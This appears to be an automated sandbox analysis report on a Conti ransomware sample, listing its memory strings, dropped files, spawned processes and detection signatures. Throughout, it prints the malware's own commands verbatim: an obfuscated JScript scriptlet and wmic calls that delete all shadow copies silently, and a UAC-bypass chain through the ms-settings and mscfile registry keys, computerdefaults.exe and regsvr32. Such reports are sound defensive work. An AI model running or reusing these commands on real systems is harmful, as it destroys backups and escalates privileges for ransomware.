Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=75&w=100&
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: svchost.exe, svchost.exe, 0000000B.00000002.495504372.0000020A025A0000.00000040.00000001.sdmp, taskhostw.exe, taskhostw.exe, 0000001E.00000002.500519852.00000255F9EB0000.00000040.00000001.sdmp, readme.txt.3.dr String found in binary or memory: https://www.torproject.org/

Spam, unwanted Advertisements and Ransom Demands:

Found ransom note / readme
Source: C:\Users\Public\readme.txt Dropped file: <?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>
Yara detected Conti ransomware
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3020, type: MEMORY
Deletes shadow drive data (may be related to ransomware)
Source: 7906dc47_by_Libranalysis.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: 7906dc47_by_Libranalysis.exe, 00000002.00000002.326052029.000001BB04C60000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: sihost.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: sihost.exe, 00000003.00000002.495205256.0000024D2C410000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: svchost.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: svchost.exe, 00000004.00000002.494909669.0000024843FF0000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: svchost.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: svchost.exe, 0000000B.00000002.495504372.0000020A025A0000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: ComputerDefaults.exe, 00000016.00000002.249758809.000001AD70D3F000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: ComputerDefaults.exe, 00000016.00000002.249758809.000001AD70D3F000.00000004.00000020.sdmp Binary or memory string: \semprocess call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.l /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process calsk
Source: ComputerDefaults.exe, 00000018.00000002.252744519.000001B8C4546000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"(m
Source: ComputerDefaults.exe, 00000018.00000002.252744519.000001B8C4546000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"-1002
Source: WMIC.exe, 0000001C.00000002.267392040.0000026D07EB0000.00000004.00000040.sdmp Binary or memory string: C:\Windows\system32\wbem\wmic.exeprocesscallcreatevssadmin.exe Delete Shadows /all /quiety 6 Model 85
Source: WMIC.exe, 0000001C.00000003.254725092.0000026D07CC5000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /all /quiet
Source: WMIC.exe, 0000001C.00000003.254725092.0000026D07CC5000.00000004.00000001.sdmp Binary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quietPz
Source: WMIC.exe, 0000001C.00000002.266165051.0000026D07C60000.00000004.00000020.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"C:\Windows\system32\wbem\wmic.exe
Source: WMIC.exe, 0000001C.00000002.266165051.0000026D07C60000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001C.00000002.267417577.0000026D07EB5000.00000004.00000040.sdmp Binary or memory string: ows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"windir=C:
Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmp Binary or memory string: call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmp Binary or memory string: process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmp Binary or memory string: mmand: process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: taskhostw.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: taskhostw.exe, 0000001E.00000002.500519852.00000255F9EB0000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: WMIC.exe, 0000001F.00000002.267280739.000002599DD40000.00000004.00000040.sdmp Binary or memory string: C:\Windows\system32\wbem\wmic.exeprocesscallcreatevssadmin.exe Delete Shadows /all /quiety 6 Model 85W
Source: WMIC.exe, 0000001F.00000002.266586711.000002599DAE3000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /all /quiet
Source: WMIC.exe, 0000001F.00000002.266586711.000002599DAE3000.00000004.00000001.sdmp Binary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quietv
Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmp Binary or memory string: call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmp Binary or memory string: process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmp Binary or memory string: mmand: process call create "vssadmin.exe Delete Shadows /all /quiet"{
Source: WMIC.exe, 0000001F.00000002.266247843.000002599DA80000.00000004.00000020.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"C:\Windows\system32\wbem\wmic.exe
Source: WMIC.exe, 0000001F.00000002.266247843.000002599DA80000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001F.00000003.255019902.000002599DAE3000.00000004.00000001.sdmp Binary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quiety
Source: WMIC.exe, 0000001F.00000002.267299677.000002599DD45000.00000004.00000040.sdmp Binary or memory string: ows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"windir=C:
Source: ComputerDefaults.exe, 00000021.00000002.266675123.000001E991F58000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: ComputerDefaults.exe, 00000023.00000002.266697182.000002090E753000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"|
Source: ComputerDefaults.exe, 00000023.00000002.266697182.000002090E753000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"-1002Z
Modifies existing user documents (likely ransomware behavior)
Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
Source: C:\Windows\System32\sihost.exe File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdf
Source: C:\Windows\System32\sihost.exe File deleted: C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdf
Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\LSBIHQFDVT.docx

System Summary:

Contains functionality to create processes via WMI
Source: WMIC.exe, 00000009.00000002.241117986.00000232C5730000.00000004.00000020.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"|
Contains functionality to call native functions
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB5710B6 NtAllocateVirtualMemory, 2_2_00007FF6AB5710B6
Detected potential crypto function
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB02490104 2_2_000001BB02490104
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB05820A16 2_2_000001BB05820A16
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB05890A16 2_2_000001BB05890A16
Source: C:\Windows\System32\sihost.exe Code function: 3_2_0000024D2C410A16 3_2_0000024D2C410A16
Source: C:\Windows\System32\svchost.exe Code function: 4_2_0000024843FF0A16 4_2_0000024843FF0A16
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000020A025A0A16 11_2_0000020A025A0A16
Source: C:\Windows\System32\taskhostw.exe Code function: 30_2_00000255F9EB0A16 30_2_00000255F9EB0A16
PE file does not import any functions
Source: 7906dc47_by_Libranalysis.exe Static PE information: No import functions for PE file found
Source: 7906dc47_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.rans.evad.winEXE@57/122@0/0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
Source: C:\Windows\System32\taskhostw.exe Mutant created: \Sessions\1\BaseNamedObjects\eltalkfzj
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5488:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_01
Source: 7906dc47_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 7906dc47_by_Libranalysis.exe Virustotal: Detection: 42%
Source: unknown Process created: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe'
Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Process created: unknown unknown
Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\taskhostw.exe Process created: unknown unknown
Source: C:\Windows\System32\taskhostw.exe Process created: unknown unknown
Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\ComputerDefaults.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
Source: 7906dc47_by_Libranalysis.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: 7906dc47_by_Libranalysis.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572A7A push rcx; retf 2_2_00007FF6AB572AA9
